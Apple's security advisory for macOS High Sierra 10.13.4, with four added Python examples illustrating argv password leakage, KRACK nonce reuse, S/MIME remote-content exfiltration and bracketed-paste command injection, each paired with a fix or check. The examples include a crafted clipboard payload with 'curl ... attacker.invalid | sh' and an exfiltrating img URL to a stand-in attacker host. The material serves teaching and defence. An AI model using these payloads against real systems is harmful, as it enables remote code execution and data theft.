About the security content of macOS High Sierra 10.13.4, Security Update 2018-002 Sierra, and Security Update 2018-002 El Capitan
This document describes the security content of macOS High Sierra 10.13.4, Security Update 2018-002 Sierra, and Security Update 2018-002 El Capitan.
About Apple security updates
For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security updates page.
For more information about security, see the Apple Product Security page. You can encrypt communications with Apple using the Apple Product Security PGP Key.
Apple security documents reference vulnerabilities by CVE-ID when possible.
macOS High Sierra 10.13.4, Security Update 2018-002 Sierra, and Security Update 2018-002 El Capitan
Admin Framework
Available for: macOS High Sierra 10.13.3
Impact: Passwords supplied to sysadminctl may be exposed to other local users
Description: The sysadminctl command-line tool required that passwords be passed to it in its arguments, potentially exposing the passwords to other local users. This update makes the password parameter optional, and sysadminctl will prompt for the password if needed.
CVE-2018-4170: an anonymous researcher
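The exposure behind CVE-2018-4170 is generic: any argument a process is started with is readable by other local users through `ps`, so a secret passed that way leaks for as long as the process lives. The script below, added here as an illustration and not Apple's or the reporter's code, scans a process listing for secret-bearing arguments and produces a redacted copy of each command line. `SAMPLE_PS` is constructed output in the shape of `ps -eo pid,user,args`, and `SECRET_FLAGS` is an assumed, partial list of flags whose value is a credential; the `sysadminctl` flag names `-password` and `-adminPassword` are the tool's own.

```python
"""Detect credentials passed as command-line arguments in a process listing.

Added example (not Apple's code).  argv is readable by every local user via
`ps`, so a secret passed as an argument, as pre-10.13.4 sysadminctl required,
is exposed for as long as the process runs.  SAMPLE_PS is constructed output
in the shape of `ps -eo pid,user,args`; SECRET_FLAGS is an assumed, partial list.
"""
import re
import shlex

SECRET_FLAGS = {"-password", "-adminpassword", "--password", "--user"}  # compared lower-case
_INLINE_FLAG = re.compile(r"^(--?[A-Za-z-]+)=(.+)$")

SAMPLE_PS = """\
  PID USER  ARGS
  412 root  /usr/libexec/trustd --agent
 7731 admin sysadminctl -addUser build -fullName "Build Bot" -password hunter2 -adminUser admin -adminPassword s3cret!
 7734 admin sysadminctl -addUser deploy -fullName "Deploy Bot"
 7802 alice curl --user alice:pa55 https://example.invalid/api
 7810 bob   mysql --password=tr0ub4dor -u bob
"""


def _tokenize(args):
    """Split an argv string the way a shell would; fall back on whitespace if quoting is unbalanced."""
    try:
        return shlex.split(args)
    except ValueError:
        return args.split()


def find_argv_secrets(ps_output):
    """Return one finding per secret-bearing argument, with a redacted copy of the command line."""
    findings = []
    for line in ps_output.splitlines():
        fields = line.split(None, 2)
        if len(fields) < 3 or not fields[0].isdigit():
            continue  # header line, or a process with no arguments
        pid, user, args = int(fields[0]), fields[1], fields[2]
        tokens = _tokenize(args)
        redacted = list(tokens)
        hits = []
        i = 0
        while i < len(tokens):
            tok = tokens[i]
            inline = _INLINE_FLAG.match(tok)
            if inline and inline.group(1).lower() in SECRET_FLAGS:
                # --password=VALUE form
                hits.append((inline.group(1), inline.group(2)))
                redacted[i] = inline.group(1) + "=REDACTED"
            elif tok.lower() in SECRET_FLAGS and i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
                # -password VALUE form; a flag that is last or followed by another flag carries no value
                hits.append((tok, tokens[i + 1]))
                redacted[i + 1] = "REDACTED"
                i += 1
            i += 1
        safe_line = shlex.join(redacted)
        for flag, secret in hits:
            findings.append({"pid": pid, "user": user, "flag": flag, "secret": secret, "redacted": safe_line})
    return findings


if __name__ == "__main__":
    for f in find_argv_secrets(SAMPLE_PS):
        print(f"pid {f['pid']} ({f['user']}): {f['flag']} given on the command line -> {f['redacted']}")
```

The 7734 entry shows the post-update pattern the advisory describes: the password argument is omitted and the tool prompts for it, so nothing sensitive appears in argv. Run against real `ps` output, the same scan works as a periodic check for scripts that still pass credentials on the command line.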
APFS
Available for: macOS High Sierra 10.13.3
Impact: An APFS volume password may be unexpectedly truncated
Description: An injection issue was addressed through improved input validation.
CVE-2018-4105: David J Beitey (@davidjb_), Geoffrey Bugniot
ATS
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: Processing a maliciously crafted file might disclose user information
Description: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.
CVE-2018-4112: Haik Aftandilian of Mozilla
CFNetwork Session
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6
Impact: An application may be able to gain elevated privileges
Description: A race condition was addressed with additional validation.
CVE-2018-4166: Samuel Groß (@5aelo)
CoreFoundation
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: An application may be able to gain elevated privileges
Description: A race condition was addressed with additional validation.
CVE-2018-4155: Samuel Groß (@5aelo)
CVE-2018-4158: Samuel Groß (@5aelo)
CoreText
Available for: macOS High Sierra 10.13.3
Impact: Processing a maliciously crafted string may lead to a denial of service
Description: A denial of service issue was addressed with improved memory handling.
CVE-2018-4142: Robin Leroy of Google Switzerland GmbH
CoreTypes
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6
Impact: Processing a maliciously crafted webpage may result in the mounting of a disk image
Description: A logic issue was addressed with improved restrictions.
CVE-2017-13890: Apple, Theodor Ragnar Gislason of Syndis
curl
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6
Impact: Multiple issues in curl
Description: An integer overflow existed in curl. This issue was addressed with improved bounds checking.
CVE-2017-8816: Alex Nichols
Disk Images
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: Mounting a malicious disk image may result in the launching of an application
Description: A logic issue was addressed with improved validation.
CVE-2018-4176: Theodor Ragnar Gislason of Syndis
Disk Management
Available for: macOS High Sierra 10.13.3
Impact: An APFS volume password may be unexpectedly truncated
Description: An injection issue was addressed through improved input validation.
CVE-2018-4108: Kamatham Chaitanya of ShiftLeft Inc., an anonymous researcher
EFI
Available for: macOS High Sierra 10.13.3
Impact: An attacker in Wi-Fi range may force nonce reuse in WPA clients (Key Reinstallation Attacks - KRACK)
Description: A logic issue existed in the handling of state transitions. This was addressed with improved state management.
CVE-2017-13080: Mathy Vanhoef of the imec-DistriNet group at KU Leuven
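Why forcing nonce reuse matters: CCMP encrypts each frame with AES in counter mode under the session key and a per-packet nonce, so two frames encrypted under the same (key, nonce) share a keystream and the XOR of their ciphertexts equals the XOR of their plaintexts. The script below, added here as an illustration and not Apple's or the researcher's code, models a client whose packet number is reset when handshake message 3 is replayed, recovers a second frame's plaintext from a known first frame, and then shows a client whose state machine ignores a message 3 for an already-installed key. The SHA-256-based keystream is a stand-in for AES-CTR so the script runs with the standard library only, and the key, frames and "fixed" state handling are constructed for the example (the advisory says only that state management was improved).

```python
"""Why a forced nonce reuse (KRACK) matters: keystream reuse in a CTR-mode cipher.

Added example (not Apple's or the researchers' code).  CCMP encrypts with
AES in counter mode keyed by the session key and a per-packet nonce; the
toy PRF keystream below (SHA-256 over key, nonce, counter) stands in for
AES-CTR so the script runs with the standard library only.  The packets,
key and fixed-client logic are constructed for the example.
"""
import hashlib


def keystream(key, nonce, length):
    """CTR-style keystream: block i = SHA-256(key || nonce || i).  Same (key, nonce) -> same bytes."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key, nonce, plaintext):
    return xor(plaintext, keystream(key, nonce, len(plaintext)))


class VulnerableClient:
    """Client state before the fix: reinstalling the pairwise key resets the packet number (nonce)."""

    def __init__(self, key):
        self.key = key
        self.pn = 0

    def handshake_message3(self):
        # A retransmitted (or attacker-replayed) message 3 reinstalls the key and resets the nonce.
        self.pn = 0

    def send(self, plaintext):
        self.pn += 1
        nonce = self.pn.to_bytes(6, "big")  # the CCMP packet number is 48 bits
        return self.pn, encrypt(self.key, nonce, plaintext)


class FixedClient(VulnerableClient):
    """Modelled fix: a message 3 for a key that is already installed must not touch the nonce."""

    def __init__(self, key):
        super().__init__(key)
        self.installed = False

    def handshake_message3(self):
        if not self.installed:
            self.installed = True
            self.pn = 0


def recover_with_crib(ct_a, ct_b, known_pt_a):
    """If both ciphertexts used one keystream, ct_a ^ ct_b == pt_a ^ pt_b, so a known pt_a reveals pt_b."""
    return xor(xor(ct_a, ct_b), known_pt_a)


def demo(client_cls):
    """Run the replay against a client class; return (nonce reused?, recovered second plaintext)."""
    client = client_cls(b"\x11" * 32)
    client.handshake_message3()                      # legitimate handshake completes
    pkt_a = b"GET /login HTTP/1.1\r\nCookie: session=aaaaaaaa\r\n"  # known to the attacker (crib)
    pkt_b = b"GET /login HTTP/1.1\r\nCookie: session=s3cr3t42\r\n"  # the frame the attacker wants
    n_a, ct_a = client.send(pkt_a)
    client.handshake_message3()                      # attacker replays message 3
    n_b, ct_b = client.send(pkt_b)
    return n_a == n_b, recover_with_crib(ct_a, ct_b, pkt_a)


if __name__ == "__main__":
    for cls in (VulnerableClient, FixedClient):
        reused, recovered = demo(cls)
        print(f"{cls.__name__}: nonce reused={reused}, recovered={recovered!r}")
```

The crib here is the whole first frame; in practice the attacker knows only parts of it (fixed protocol headers), and recovers the second frame at those positions. Integrity is not the issue, since CCMP's MIC still verifies; confidentiality is what the reused keystream gives away.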
File System Events
Available for: macOS High Sierra 10.13.3
Impact: An application may be able to gain elevated privileges
Description: A race condition was addressed with additional validation.
CVE-2018-4167: Samuel Groß (@5aelo)
iCloud Drive
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: An application may be able to gain elevated privileges
Description: A race condition was addressed with additional validation.
CVE-2018-4151: Samuel Groß (@5aelo)
Intel Graphics Driver
Available for: macOS High Sierra 10.13.3
Impact: An application may be able to execute arbitrary code with system privileges
Description: A memory corruption issue was addressed with improved memory handling.
CVE-2018-4132: Axis and pjf of IceSword Lab of Qihoo 360
IOFireWireFamily
Available for: macOS High Sierra 10.13.3
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A memory corruption issue was addressed with improved memory handling.
CVE-2018-4135: Xiaolong Bai and Min (Spark) Zheng of Alibaba Inc.
Kernel
Available for: macOS High Sierra 10.13.3
Impact: A malicious application may be able to execute arbitrary code with kernel privileges
Description: Multiple memory corruption issues were addressed with improved memory handling.
CVE-2018-4150: an anonymous researcher
Kernel
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input sanitization.
CVE-2018-4104: The UK's National Cyber Security Centre (NCSC)
Kernel
Available for: macOS High Sierra 10.13.3
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A memory corruption issue was addressed with improved memory handling.
CVE-2018-4143: derrek (@derrekr6)
Kernel
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: An out-of-bounds read was addressed through improved bounds checking.
CVE-2018-4136: Jonas Jensen of lgtm.com and Semmle
Kernel
Available for: macOS High Sierra 10.13.3
Impact: An application may be able to execute arbitrary code with system privileges
Description: An out-of-bounds read was addressed through improved bounds checking.
CVE-2018-4160: Jonas Jensen of lgtm.com and Semmle
Kernel
Available for: macOS High Sierra 10.13.3
Impact: A malicious application may be able to determine kernel memory layout
Description: An information disclosure issue existed in the transition of program state. This issue was addressed with improved state handling.
CVE-2018-4185: Brandon Azad
kext tools
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: An application may be able to execute arbitrary code with system privileges
Description: A logic issue existed resulting in memory corruption. This was addressed with improved state management.
CVE-2018-4139: Ian Beer of Google Project Zero
LaunchServices
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: A maliciously crafted application may be able to bypass code signing enforcement
Description: A logic issue was addressed with improved validation.
CVE-2018-4175: Theodor Ragnar Gislason of Syndis
libxml2
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: Processing maliciously crafted web content may lead to an unexpected Safari crash
Description: A use after free issue was addressed with improved memory management.
CVE-2017-15412: Nick Wellnhofer
LinkPresentation
Available for: macOS High Sierra 10.13.3
Impact: Processing a maliciously crafted text message may lead to UI spoofing
Description: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.
CVE-2018-4187: Roman Mueller (@faker_), Zhiyang Zeng (@Wester) of Tencent Security Platform Department
Local Authentication
Available for: macOS High Sierra 10.13.3
Impact: A local user may be able to view sensitive user information
Description: There was an issue with the handling of smartcard PINs. This issue was addressed with additional logic.
CVE-2018-4179: David Fuhrmann
Mail
Available for: macOS High Sierra 10.13.3
Impact: An attacker in a privileged network position may be able to exfiltrate the contents of S/MIME-encrypted e-mail
Description: An issue existed in the handling of S/MIME HTML e-mail. This issue was addressed by not loading remote resources on S/MIME encrypted messages by default if the message has an invalid or missing S/MIME signature.
CVE-2018-4111: Damian Poddebniak of Münster University of Applied Sciences, Christian Dresen of Münster University of Applied Sciences, Jens Müller of Ruhr University Bochum, Fabian Ising of Münster University of Applied Sciences, Sebastian Schinzel of Münster University of Applied Sciences, Simon Friedberger of KU Leuven, Juraj Somorovsky of Ruhr University Bochum, Jörg Schwenk of Ruhr University Bochum
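The fix is a rendering policy: when a message is S/MIME-encrypted, remote resources referenced from its decrypted HTML are not fetched unless the message carries a valid signature. The script below, added here as an illustration and not Apple's Mail code, collects the http(s) references a renderer would fetch from an HTML body and applies that policy beside the pre-update behaviour. The HTML body, the signature states and the helper names are constructed for the example, and the user's global remote-content preference is assumed to be "load".

```python
"""Remote-content policy for S/MIME mail, as the fix describes it.

Added example (not Apple's Mail code).  A renderer that fetches remote
resources referenced from the decrypted HTML of an S/MIME message gives an
attacker who can wrap or alter the ciphertext a channel for the plaintext
(the credited researchers' EFAIL technique).  The policy below loads remote
resources from an encrypted message only when it carries a valid signature,
the new default per the advisory.  HTML and signature states are constructed;
the user's global "load remote content" preference is assumed to be enabled.
"""
from html.parser import HTMLParser
from urllib.parse import urlsplit

# (tag, attribute) pairs whose value is fetched from the network when rendered.
FETCHING_ATTRS = {
    ("img", "src"), ("link", "href"), ("script", "src"), ("iframe", "src"),
    ("video", "src"), ("audio", "src"), ("source", "src"), ("object", "data"),
}


class RemoteReferences(HTMLParser):
    """Collect http(s) URLs the renderer would fetch for this HTML."""

    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if (tag, name) in FETCHING_ATTRS and value:
                if urlsplit(value).scheme in ("http", "https"):  # cid:/data: stay local
                    self.urls.append(value)


def remote_references(html):
    parser = RemoteReferences()
    parser.feed(html)
    parser.close()
    return parser.urls


def may_load_remote(encrypted, signature):
    """Fixed default: encrypted messages load remote content only with a valid S/MIME signature."""
    if not encrypted:
        return True
    return signature == "valid"


def resources_to_fetch(html, encrypted, signature):
    """URLs the renderer fetches for the message under the fixed policy."""
    return remote_references(html) if may_load_remote(encrypted, signature) else []


def legacy_resources_to_fetch(html, encrypted, signature):
    """Pre-fix behaviour: remote content loaded regardless of encryption or signature state."""
    return remote_references(html)


# Constructed decrypted body: an attacker-added <img> whose URL carries the plaintext,
# next to an inline (cid:) image that is not a network fetch.
SAMPLE_DECRYPTED_HTML = (
    '<html><body>'
    '<img src="https://attacker.invalid/collect?d=Meeting+password+is+hunter2">'
    '<img src="cid:logo@example.invalid">'
    '<p>Meeting password is hunter2</p>'
    '</body></html>'
)

if __name__ == "__main__":
    for state in ("missing", "invalid", "valid"):
        print(state, "->", resources_to_fetch(SAMPLE_DECRYPTED_HTML, True, state))
```

Two caveats for anyone implementing the same check: "valid" has to mean a signature that verifies and chains to the expected sender, since an attacker can sign their own wrapper with a certificate they control, and CSS `url(...)` values in style attributes and stylesheets are further fetch points the parser above does not cover. Disabling remote content for all mail remains the stronger setting.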
Mail
Available for: macOS High Sierra 10.13.3
Impact: An attacker in a privileged network position may be able to intercept the contents of S/MIME-encrypted e-mail
Description: An inconsistent user interface issue was addressed with improved state management.
CVE-2018-4174: John McCombs of Integrated Mapping Ltd, McClain Looney of LoonSoft Inc.
Notes
Available for: macOS High Sierra 10.13.3
Impact: An application may be able to gain elevated privileges
Description: A race condition was addressed with additional validation.
CVE-2018-4152: Samuel Groß (@5aelo)
Notes
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: An application may be able to gain elevated privileges
Description: A race condition was addressed with additional validation.
CVE-2017-7151: Samuel Groß (@5aelo)
NSURLSession
Available for: macOS High Sierra 10.13.3
Impact: An application may be able to gain elevated privileges
Description: A race condition was addressed with additional validation.
CVE-2018-4166: Samuel Groß (@5aelo)
NVIDIA Graphics Drivers
Available for: macOS High Sierra 10.13.3
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input sanitization.
CVE-2018-4138: Axis and pjf of IceSword Lab of Qihoo 360
PDFKit
Available for: macOS High Sierra 10.13.3
Impact: Clicking a URL in a PDF may visit a malicious website
Description: An issue existed in the parsing of URLs in PDFs. This issue was addressed through improved input validation.
CVE-2018-4107: Nick Safford of Innovia Technology
PluginKit
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: An application may be able to gain elevated privileges
Description: A race condition was addressed with additional validation.
CVE-2018-4156: Samuel Groß (@5aelo)
Quick Look
Available for: macOS High Sierra 10.13.3
Impact: An application may be able to gain elevated privileges
Description: A race condition was addressed with additional validation.
CVE-2018-4157: Samuel Groß (@5aelo)
Remote Management
Available for: macOS High Sierra 10.13.3
Impact: A remote user may be able to gain root privileges
Description: A permissions issue existed in Remote Management. This issue was addressed through improved permission validation.
CVE-2018-4298: Tim van der Werff of SupCloud
Security
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: A malicious application may be able to elevate privileges
Description: A buffer overflow was addressed with improved size validation.
CVE-2018-4144: Abraham Masri (@cheesecakeufo)
SIP
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6
Impact: An application may be able to execute arbitrary code with kernel privileges
Description: A configuration issue was addressed with additional restrictions.
CVE-2017-13911: Timothy Perfitt of Twocanoes Software
Status Bar
Available for: macOS High Sierra 10.13.3
Impact: A malicious application may be able to access the microphone without indication to the user
Description: A consistency issue existed in deciding when to show the microphone use indicator. The issue was resolved with improved capability validation.
CVE-2018-4173: Joshua Pokotilow of pingmd
Storage
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: An application may be able to gain elevated privileges
Description: A race condition was addressed with additional validation.
CVE-2018-4154: Samuel Groß (@5aelo)
System Preferences
Available for: macOS High Sierra 10.13.3
Impact: A configuration profile may incorrectly remain in effect after removal
Description: An issue existed in CFPreferences. This issue was addressed with improved preferences cleanup.
CVE-2018-4115: Johann Thalakada, Vladimir Zubkov, and Matt Vlasach of Wandera
Terminal
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: Pasting malicious content may lead to arbitrary command execution
Description: A command injection issue existed in the handling of Bracketed Paste Mode. This issue was addressed through improved validation of special characters.
CVE-2018-4106: Simon Hosie
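With bracketed paste mode on, the terminal sends pasted text between ESC[200~ and ESC[201~ and the line editor treats newlines inside the brackets as literal text rather than as Enter. If the terminal forwards the clipboard unchanged, a paste that contains its own ESC[201~ closes the bracket early, and the newline that follows is delivered as a keystroke that runs whatever came before it. The script below, added here as an illustration and not Apple's Terminal code, models both the injection and one hardening (dropping ESC and other control characters from the paste before bracketing it). The clipboard content and the line-editor model are constructed for the example, and the filter is one way to do the "validation of special characters" the advisory mentions, not necessarily Apple's implementation.

```python
"""Bracketed-paste command injection and the validation that stops it.

Added example (not Apple's Terminal code).  With bracketed paste mode on, a
terminal sends pasted text between ESC[200~ and ESC[201~ and the line editor
treats newlines inside the brackets as literal text.  If the terminal forwards
the clipboard unchanged, a paste containing its own ESC[201~ ends the bracket
early, and the newline that follows is delivered as an Enter keystroke.  The
clipboard content and the line-editor model are constructed for the example;
the hardening (drop ESC and other control characters) is one implementation
of the validation the advisory describes, not necessarily Apple's.
"""
PASTE_BEGIN = "\x1b[200~"
PASTE_END = "\x1b[201~"

# Constructed malicious clipboard: looks like one harmless command, but smuggles a second one.
MALICIOUS_CLIPBOARD = (
    "echo harmless" + PASTE_END
    + "\ncurl -s https://attacker.invalid/p | sh\n"
    + PASTE_BEGIN
)


def wrap_paste_vulnerable(clipboard):
    """Forward the clipboard verbatim inside paste brackets."""
    return PASTE_BEGIN + clipboard + PASTE_END


def wrap_paste_hardened(clipboard):
    """Drop ESC, DEL, C1 controls and C0 controls other than tab/CR/LF before bracketing,
    so no pasted character can close the bracket or start another escape sequence."""
    cleaned = "".join(
        ch for ch in clipboard
        if ch in "\t\r\n" or (" " <= ch and ch != "\x7f" and not "\x80" <= ch <= "\x9f")
    )
    return PASTE_BEGIN + cleaned + PASTE_END


def line_editor(stream):
    """Model of a readline-style editor with bracketed paste enabled.

    CR/LF outside a bracket executes the buffer; inside a bracket they are
    inserted as text.  Returns (executed_commands, pending_buffer)."""
    executed, buf, in_paste, i = [], "", False, 0
    while i < len(stream):
        if stream.startswith(PASTE_BEGIN, i):
            in_paste, i = True, i + len(PASTE_BEGIN)
        elif stream.startswith(PASTE_END, i):
            in_paste, i = False, i + len(PASTE_END)
        else:
            ch = stream[i]
            i += 1
            if ch in "\r\n" and not in_paste:
                executed.append(buf)
                buf = ""
            else:
                buf += ch
    return executed, buf


if __name__ == "__main__":
    print("vulnerable:", line_editor(wrap_paste_vulnerable(MALICIOUS_CLIPBOARD))[0])
    print("hardened:  ", line_editor(wrap_paste_hardened(MALICIOUS_CLIPBOARD))[0])
```

After hardening, the pasted text still lands in the editor buffer (now visibly containing the stray `[201~` and `[200~`) and nothing runs until the user presses Enter, which is the guarantee bracketed paste is meant to give. The same filter belongs in any tool that re-injects clipboard or remote data into a pty, not only in the terminal emulator.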
WindowServer
Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.3
Impact: An unprivileged application may be able to log keystrokes entered into other applications even when secure input mode is enabled
Description: By scanning key states, an unprivileged application could log keystrokes entered into other applications even when secure input mode was enabled. This issue was addressed by improved state management.
CVE-2018-4131: Andreas Hegenberg of folivora.AI GmbH
Additional recognition
We would like to acknowledge Sabri Haddouche (@pwnsdx) from Wire Swiss GmbH for their assistance.
Safari Login AutoFill
We would like to acknowledge Jun Kokatsu (@shhnjk) for their assistance.
Security
We would like to acknowledge Abraham Masri (@cheesecakeufo) for their assistance.
Sharing Pref Pane
We would like to acknowledge an anonymous researcher for their assistance.
Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.